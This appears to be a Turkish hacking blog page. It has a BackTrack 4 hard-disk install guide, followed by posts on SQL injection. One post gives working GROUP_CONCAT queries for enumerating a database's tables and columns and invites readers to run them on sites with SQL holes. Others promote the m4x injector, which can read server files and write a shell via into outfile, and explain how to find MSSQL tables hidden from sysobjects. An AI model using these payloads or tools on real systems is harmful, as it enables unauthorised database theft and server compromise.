x4913a

Backtrac 4 harddisk kurulum

Backtrack bilmeyeniniz yoktur.Ama bunu harddiske kuran genelde yokdenecek kadar azdir.Nette backtrack kurulumu diye aradigimiz zaman genelde ya ingilizce dokumanlara ya da ingilizce videolara denk geliyoruz ben turkce dokuman ya da video gormedim.Neyse uzun lafin kisasi size backtrack kurulumunu anlatacagim.

ilk olarak bu linkten http://www.remote-exploit.org/backtrack_download.html

BackTrack 4 Pre Release yi indiriyoruz.indirdiyiniz iso dosyasini nero ile kalib dvd olarak yazdiriyoruz.Sonra boot tan cd room u seciyoruz yani pc yi cd roomdan baslatiyoruz.Neyse devam edelim...
Baslattiktan sonra bekliyoruz yazilar yazacak sonra bt4 login gorduyumuz zaman (yani kullanici adi istediyi zaman) biz buraya root yazicaz. Ardindan password istiyicek biz buraya toor yazicaz enter basicaz . Sonra startx yazip enter dedigimiz zaman backtrca basliyicak ama live cd olarak neyse simdi harddisk kurulumuna gecelim ;

Eevet backtrack baslamıştı.Hemen Konsolu açıyoruz ve konsola ubiquity yazıp enter dediğimiz zaman ubiquity installer açılacak yani kur açılacak kur açılınca ilk olarak dil seçimimizi yapıp forward butonuna tıklıyıcaz. sonra bölge seçimini yapıyoruz istanbul u seçicez forward butonuna tikliyicaz.Sonra Klavye seçimimizi yapıcaz turkey seçicez solaltta klavye denemek için kutucuk var oradan doğru seçip seçmediğinizi deneyebilirsiniz doğru seçimi yaptıktan sonra forward a tıklıyıcaz.

Evet geldik en önemli kısma Harddiskin neresine kuracağımızı soran bölüme geldik.Burada bize iki seçenek var biri harddiskin tamamını kullan diğeri ise manual yani hardiskin herhangi bir bölümünü seç. Biz burada eğer harddiskin tamamını kullanacaksak ilk seçeneği seçicez yok eğer başka bir işletim sistemi daha kuruluysa pc de veya yedeklediğimiz dosyalarımız varsa ikinci secenegi yani manual ı işaretleyip forward butonuna tıklıyıcaz.ilki yani harddiskin tamamını seçenler forward butonuna tıkladıkları zaman direk kullanıcı adı ve şifre seçme bölümüne gelicekler ikinci seçeneği seçenler ise forward butonuna tıkladıkları zaman harddiskin bolumlerine gelicekler sonra nereye kurmak istediklerini seçip forward a tıklıyıcaklar ve kullanıcı adı ve şifre seçme bölümüne gelicekler. neyse ikinciden devam edelim manual i seçip forward a tıkladıktan sonra hardiskin bölümleri gelicek biz nereye kurmak istiyorsak o bolumu seçip sonra bölümü düzenleme menüsünden yani sol altta edit partition a tıklıyıcaz...
Şimdi buraya dikkat tıkladıktan sonra ilk olarak bölümü açılır menüden ext2 file system i sececez..
sonra kök dizini olarak herhangi birini yani /, /boot,/home vs. bunlardan birini seçip tamam a tıklıyıcaz.sonra takas alanı için kücük bir bölüm seçicez mesela 8MB olarak herhangi bir bölümü seçip edit partition a tıklıyıcaz bu sefer buraya açılır menüden takas alanini seçip tamam diyicez sonra ilk olarak seçtiğimiz ext2 file system yani kurulacak bölümü seçip forward a tıklıyıcaz evet geldik kullanıcı adı şifre ve desktop bölümüne burada 4 kutucuk var ilkinde diyorki adınızı yazın herhangi bir ad yazın ne biliyim nick inizi yazın sonra ikinci kısımda kullanıcı adı yani backtrack oturum açarken kullanıcağınız user.zaten burada ilki yani adınızla kullanıcı adınız aynı olucak neyse üçüncü kutuya şifremizi yazıyoruz yanındaki kutuya tekrar aynı şifreyi yazıyoruz ama burada yazacağımız kullanıcı adı , şifre ve masaüstü adınızı not alın unutmayın lazım olacak neyse devam edelim geldik sonuncu kutuya burada masaüstü adınızı soruyor istediğinizi yazın sonra forward a tıklıyıcaz.

Sonra kullanıcı sözleşmesi gibi bişey gelicek tekrar forward a tıklıyıcaz. Tıkladıktan sonra eğer pc nizde baska işletim sistemi varsa oradan bişey aktarayımmı diye bölüm gelicek siz aktarmak isterseniz seçmek istediklerinizi seçip forward a tıklarsınız yok aktarmak istemezseniz yine forward a tıklayın zaten işletim sistemi yoksa pc de o bölüm gelmez forward a tıklarsınız kurulum başlar eğer başka işletim sistemi varsa aktarmak istediklerinizi seçip forward a tiklarsiniz yine kurulum başlar evet her iki durumda da kurulum başladı kurulum %100 olana kadar bekliyorsunuz %100 oldumu size pc yi yeniden başlatayımmı diyicek siz restart now a tıklıyıcaksınız yani yeniden başlat evet artık cd mizi çıkarabiliriz. evet pc yeniden başlamadan önce boot tan harddiski seçiyoruz yani pc yi harddisk ile başlatıyoruz...

Harddisk ile başladıktan sonra bekliyoruz yazılar yazıcak hani ilk başta demiştimya masa üstü adınızı kullanıcı adınızı ve şifrenizi not alınız işte yazılar yazdıktan sonra masaüstü adınız diyelim x4913a olsun.Yazılar yazdıktan sonra x4913a login yazısını görücez (ben ornek olarak x4913a dedim sizde neyse o) biz buraya not aldığımız kullanıcı adımızı yazıp enter a basıcaz ardından password istiyicek biz buraya not aldıgımız password u yazıcaz...
Şimdi root@x4913a yazısını görücez (ben x4913a ornek verdim sizde masa üstü adınız neyse o) neyse root@x4913a görünce sudo su yazıcaz sonra enter a basıcaz hemen altına sudo password yazıcak biz buraya not aldığımız sifreyi yazicaz enter a basıcaz.

Sonra hemen altında root@x4913a yazısını görücez (ben x4913a yi örnek verdim sizde not aldiginiz kullanıcı adı neyse o) neyse root@x4913a görünce passwd yazıp enter a basıcaz yani şifremi deyiş anlamına geliyor hemen altına new UNIX password yazıcak yani yeni şifreyi gir biz buraya toor yazıcaz.(Not: toor dan başka birşey yazmayın) neyse toor yazıp enter bastıktan sonra hemen altına Rytype new UNIX password yazıcak yani yeni şifreyi tekrar gir biz buraya tekrar toor yazıp enter basıcaz...

Hemen altına root@masaüstüadınız:/home/kullanıcıadınız (not:masaüstü adınız yerine not aldığınız masaüstü adı yazıcak kullanıcı adınız yazan yere de not aldığınız kullanıcı adı yazıcak) neyse diyelim masaüstü adınız ve kullanıcı adınız x4913a olsun root@x4913a:/home/x4913a# yazısını görünce exit yazın enter a basın. Sonra tekrar exit yazın enter a basın. sonra x4913a login yazısını görünce (not : x4913a masaustu adiniz dir ben ornek olarak x4913a dedim) neyse x4913a login yazısını görünce root yazın enter a basın Not: Artik kullanici adiniz herzaman root sifrenizde toor neyse x4913a login göruünce root yazıcaz entera basıcaz sonra hemen altına password yazıcak buraya da toor yazıcaz anter a basıcaz. Sonra root@x4913a yani root@masaüstü adınızı görünce userdel x4913a yazıp enter a basıcaz yani not aldığımız kullanıcı adını silicez Not:x4913a örnektir siz not aldıgınız kullanıcı adını yazıyorsunuz neyse userdel x4913a yazıp enter dedikten sonra hemen altına root@masaüstüadınız:~# yazıcak biz buraya rm -rf /home/notaldıgınızmasaüstüadınız/ yazıp enter a basıcaz not: notaldığınızmasaüstüadınız yazanyere ilkbaşta not alın dediğim masaüstü adınızı yazıcaksınız neyse devam ediyoruz enter a bastıktan sonra root@notaldıgınızmasaüstüadınız:~# yazısını görünce startx yazıp enter a basıcaz evet kurulum bukadar , eğer nete bağlanamazsanız konsolu açın oraya /etc/init.d/wicd start yazıp enter a basın sonra sol alttan başlat menüsünden yani kde menüsünden internet oradan da wicd Network Manager a tıklayın sonra sonra Wicd Manager açılacak orada Wired Network yazısının yanında ki ok işaretine tıklayın sonra Advanced Settings e tıklayın sonra Use Static IPs kutucuğunu işeretleyin sonra Ip yazanyere Ip adresinizi Net mask yazan yere alt ağmaskezini yazın zaten ona tıkladığınız zaman alt ağmaskesi otomatik olarak yazılır Gateway a da varsayılan ağ geçidinizi yazın sonra DNS 1 e varsayılan ağ geçidinin aynısını yazın tamam a tıklayın sonrada wired Network yazısının hemen altındaki connect e tıklayın ve kapatın. sonra son olarak konsola update-rc.d wicd defaults yazıp enter a basıcaz.
Bu kadar arkadaslar kusurumuz varsa affola anlamadıgınız yerleri burada bana sorabilirsiniz.


kaynak: http://www.theh4cker.org
READMORE
 

GROUP_CONCAT MySQL SQL Injection

Yeni Mysql Injection teknigi . Pratik için deneme yapabilirsiniz arkadaslar mesela Sql açigi olan bir siteye bu kodu uygulayarak baslayabilirsiniz ; SELECT CONCAT(TABLO_ADI,’>’,GROUP_CONCAT(KOLON_ADI)) FROM information_schema.columns …

SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1

SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 2,1

SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 3,1
SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT n,1


M0sted kankama teşekkürler.
Kaynak : http://hack-frozen.org
READMORE
 

M4x Sql Injection Tools Download



Download m4x Sql Injection Tools

m4x mysql injector demonstration (Nasıl kullanılır video)
m4x mssql injector demonstration (Nasıl kullanılır video)

  • Standart methodların aksine farklı bir yöntem kullanıldığı için m4x mysql injector benzer uygulamaların aksine çok daha hızlı çalışmaktadır.

  • Veriler aynı Database management sistemleri veya scriptlerinde olduğu gibi birebir çekilmektedir.

  • Treeview kontrolü kullanıldığı için listeleme işlemlerinizi oldukça kolay yapabilirsiniz.

  • Veriler listelenirken istenilirse limit belirtilir o limit kadar veri çekilir.

  • Verileri ister sondan(desc) ister baştan (asc) olarak çekebilirsiniz.

  • Verileri çekerken progressbar sayesinde işlemin ne kadar kaldığını görebilirsiniz.

  • Çektiğiniz verileri excele aktararak kolaylıkla yönetebilirsiniz.

  • Daha önce listelediğiniz db yapısını kaydederek, daha sonraki kullanımlarda tekrar tekrar aynı işlemleri yapmanıza gerek kalmadan yükleyebilirsiniz.

  • m4x mysql ile db kullanıcısı dosya izinlerine sahip ise , load_file, into outfile ve into dumpfile fonksiyonlarını çalıştırabilirsiniz. Load file ile istediğiniz dosyayı okuyup, into out file ile de istediğiniz dizine shell'inizi yazdırabilirsiniz.

  • Magic Quotes Gpc ' den etkilenmez. On veya off farketmez.


For English explaination click below link


  • m4x mysql injector more faster than similar programs because it uses different methods

  • It has proxy selection according to user choice.

  • Datas getting one to one like the other database management systems or scripts.

  • You can make your listing process faster because it's include Treeview control

  • It's include data limit.It's mean you can get data with what you decide about that

  • You can get datas from end(desc) or from start(asc)

  • You can see how much time left to end process with progressbar.

  • You can export your datas to Microsoft Excel

  • If you want do your half work later you can do it easyly with saving your database

  • If the m4x mysql injector have database user's permissions, you can execute load_file, into outfile and into dumpfile functions.You can read file which do you want with load file
    and you can write your shell to directory which do you want with into out

  • It doesn't affect with Magic Quotes Gpc.It doesn't matter on or off


m4x mysql injector demonstration (How to use video)
m4x mssql injector demonstration (How to use video)

H4ckinger AND Rmx İkinizinde elinize sağlık teşekkürler.
READMORE
 

MSSQL de Gizli Tablolar

mssql de sysobjectse ulaşmak demek her tablo adına ulaşmak demek değildir. db admin bazı tabloların sysobjectsde görünmemesini sağlayabilir fakat bu tabloyu okuyamayacağınız manasına gelmez. misal “select top 1 name from sysobjects where name like ‘%admin%’” yazdığınızda admin tablosunu vermez fakat “select top 1 asd from admin” yazdığınızda asd diye column bulunamadı, ki bu admin tablosu doğru fakat kolon yanlış demektir. yani admin tablosu var fakat sysobjects de görünmüyor. peki bu gizli tabloları nasıl çekebiliriz. bilginin gizliliği prensibim olduğu için kodu vermeyeceğim fakat mantığını anlatabilirim. db admini tablo adlarını saklasa bile kolon adlarını saklayamaz veya saklamaz diyelim, çünkü kolon adlarından yola çıkılacağını hesaplamaz. peki napabiliriz? syscolumns dan yola çıkıp username password gibi kolonları bulup sonra bu kolon adlarını doğru sql cümlesinde kullanarak o kolon adının tablosunu öğrenebiliriz. tablo sysobjects de görünmese bile biz adını öğrendikten sonra bi önemi yoktur ;)
READMORE
 

m4x mysql injector demonstration



m4x mysql injector demonstration
  • Standart methodların aksine farklı bir yöntem kullanıldığı için m4x mysql injector benzer uygulamaların aksine çok daha hızlı çalışmaktadır.

  • Kullanıcı seçimine bağlı olarak proxy özelliği vardır.

  • Veriler aynı Database management sistemleri veya scriptlerinde olduğu gibi birebir çekilmektedir.

  • Treeview kontrolü kullanıldığı için listeleme işlemlerinizi oldukça kolay yapabilirsiniz.

  • Veriler listelenirken istenilirse limit belirtilir o limit kadar veri çekilir.

  • Verileri ister sondan(desc) ister baştan (asc) olarak çekebilirsiniz.

  • Verileri çekerken progressbar sayesinde işlemin ne kadar kaldığını görebilirsiniz.

  • Çektiğiniz verileri excele aktararak kolaylıkla yönetebilirsiniz.

  • Daha önce listelediğiniz db yapısını kaydederek, daha sonraki kullanımlarda tekrar tekrar aynı işlemleri yapmanıza gerek kalmadan yükleyebilirsiniz.

  • m4x mysql ile db kullanıcısı dosya izinlerine sahip ise , load_file, into outfile ve into dumpfile fonksiyonlarını çalıştırabilirsiniz. Load file ile istediğiniz dosyayı okuyup, into out file ile de istediğiniz dizine shell'inizi yazdırabilirsiniz.

  • Magic Quotes Gpc ' den etkilenmez. On veya off farketmez.


  • H4ckinger e teşekkürler

    kaynak: http://h4ckinger.org
    READMORE